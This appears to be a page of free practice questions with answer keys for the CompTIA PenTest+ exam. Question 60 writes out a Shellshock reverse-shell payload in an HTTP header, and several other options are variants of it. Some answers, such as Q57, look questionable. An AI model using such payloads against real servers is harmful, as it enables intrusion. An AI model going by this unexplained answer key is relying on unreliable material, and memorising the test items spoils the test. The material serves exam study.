Free PT0-002 Exam Braindumps

Pass your CompTIA PenTest+ Certification Exam with these free Questions and Answers

Page 13 of 56

QUESTION 56

Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

  A. MSA
  B. NDA
  C. SOW
  D. ROE

Correct Answer: B

QUESTION 57

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

  A. Unsupported operating systems
  B. Susceptibility to DDoS attacks
  C. Inability to network
  D. The existence of default passwords

Correct Answer: A

QUESTION 58

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

  A. Comma
  B. Double dash
  C. Single quote
  D. Semicolon

Correct Answer: C

QUESTION 59

Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

  A. The team exploits a critical server within the organization.
  B. The team exfiltrates PII or credit card data from the organization.
  C. The team loses access to the network remotely.
  D. The team discovers another actor on a system on the network.

Correct Answer: D

QUESTION 60

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
  C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Correct Answer: A
